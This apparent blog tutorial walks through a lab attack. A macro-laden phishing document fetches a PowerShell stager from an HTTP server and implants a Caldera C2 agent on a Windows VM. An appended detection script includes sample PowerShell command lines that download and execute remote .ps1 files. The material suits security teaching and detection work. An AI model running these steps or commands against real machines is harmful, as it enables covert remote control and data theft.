How a Hacker can get access to your computer

Salim Salimov
5 min read, Aug 11, 2023


Hello There,

Here I am again, and today I am going to show you how an attacker can infect your computer with an agent that communicates back to him and allows him to get full access to your system.

For the demonstration I am going to use a Caldera server and a spear-phishing document with macro code.

* As the attacker, I will operate my main Linux Mint OS with the Caldera server installed; I also need a local server app to provide an HTTP path to the malicious PowerShell script file (malware.ps1).

* As the victim, I will operate a Windows 7 virtual machine.

What is Caldera server? You can check it out here:

https://github.com/mitre/caldera

Let's imagine you received an email with an attached document, and you clicked on Enable Macros to see some content in that document. This macro code infected your system without you noticing anything. How is that possible?

In my previous post I explained how to create a document with hidden malicious code embedded in it.

https://medium.com/@salim.y.salimov/malicious-attack-with-macro-c

Now let's see what the next step is that the attacker takes, and how he does it.

Here is the illustration of this scenario:

Let's begin and see step by step how it's done.

1. On my attacker system I start a few things as preparation:

- Use Ctrl+Alt+T to open the terminal.

Get your local IP address with this command:

ifconfig

- We will need a local HTTP server, started with this command:

python3 -m http.server --bind 192.168.1.116 9000

(replace the address with your own IP)

- Open another terminal window and start the Caldera server with this command:

cd ~/caldera && python3 server.py

- Open the Caldera web interface in a web browser:

http://localhost:8888/

- Log in as red team with user: RED and password: admin,

or, if you have changed it, use your own password. If you don't know it at all, open another terminal and run this command:

cd ~/caldera/conf && gedit local.yml

Scroll down to the bottom in the text editor; the password should be there. Just copy and paste it.

(For my convenience I have created desktop launchers that execute these commands.)

Once logged in you can minimize the two terminals that are running the servers, but do not close them.

2. Prepare an agent in the Caldera web interface

- Go to Agents and click on Configuration. Here you can change a few things, such as the name of the agent file that is going to be implanted on the victim's machine; I am going to leave it as default for now.

- Click on Deploy an agent and choose one of the available options in the drop-down menu, as well as the OS of the victim. I choose Sandcat with HTTP, then the Windows version.

- On the next screen use your Caldera server's IP; in my case it is my main operating system's localhost IP again.

- Copy the first generated code underneath, create a new empty plain text document (for example on the desktop), open it and paste the Caldera code inside, save and close, then rename it to malware with the extension .ps1.

3. Now we are ready to implant an agent on our victim's machine, which will be my virtual Windows 7 machine. Let's test if it works.

4. Testing

- Start up the VM.

- Check that the separate HTTP server we created earlier on port 9000 (http://192.168.1.116:9000/) is accessible with a browser.

- Check the macro code in the spear-phishing document and edit it to match the file name and location: it should point to the malware.ps1 that we created on our desktop and should reach it via our HTTP server.

- Copy this document to the VM (we pretend it has been sent by email) and wait for the victim to open it.

- Keep an eye on the Agents tab in the Caldera web interface.

- On the virtual machine, open the document as the victim would do.

- And HERE WE GO: the agent is implanted and the attacker has a command and control server working for him.

- From now on he can send different commands, choosing auto-generated or manual ones through the Caldera server, to manipulate, steal, and exfiltrate information and data.

Of course, in reality this would not be that easy, as this attack would be detected by antivirus software or Windows Defender, unless the attacker uses different tactics and techniques to avoid detection.
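As an added example (not code from the original post or from Caldera), here is the detection logic a defender would run over process-creation telemetry to catch exactly this chain: an Office application spawning a script host whose command line pulls a remote .ps1 from the attacker's HTTP server. The sample events are constructed Sysmon-style records, and the process lists and regexes are my assumptions, not a vendor rule.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed Sysmon-style process-creation records (not real telemetry):
# parent image | child image | child command line, one record per line.
SAMPLE_EVENTS = """\
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe
C:\\Program Files\\Microsoft Office\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.116:9000/malware.ps1')"
C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Get-ChildItem
C:\\Program Files\\Microsoft Office\\EXCEL.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -c "iwr http://10.0.0.5:8080/stage.ps1 -OutFile $env:TEMP\\a.ps1"
"""

# Office applications that should almost never spawn a script host directly (assumed list).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# A URL ending in .ps1 on the command line: the stager being fetched from a remote HTTP server.
REMOTE_SCRIPT = re.compile(r"https?://[^\s'\"]+\.ps1\b", re.IGNORECASE)
# Switches that hide the window or relax policy, typical of macro-launched PowerShell.
SUSPICIOUS_FLAGS = re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b|-noprofile\b|-enc(odedcommand)?\s)")


@dataclass
class Alert:
    parent: str
    child: str
    remote_script: Optional[str]
    severity: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events_text: str) -> list:
    """Return one Alert per Office -> script-host process creation found in the records."""
    alerts = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        parent, child, cmdline = line.split("|", 2)
        if _basename(parent) not in OFFICE_APPS or _basename(child) not in SCRIPT_HOSTS:
            continue  # parent/child pair is outside this rule's scope
        url = REMOTE_SCRIPT.search(cmdline)
        # Office spawning a script host is suspicious on its own (medium); a remote .ps1
        # or evasion switches on the command line raise it to high.
        severity = "high" if url or SUSPICIOUS_FLAGS.search(cmdline) else "medium"
        alerts.append(Alert(_basename(parent), _basename(child), url.group(0) if url else None, severity))
    return alerts
```

The same parent/child pairing is what endpoint products key on, which is why the article's caveat about Windows Defender holds: the macro-to-PowerShell hop is the noisiest step of the whole chain.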

Hope you have enjoyed this article, Thanks for reading, and I will see you in the next one.
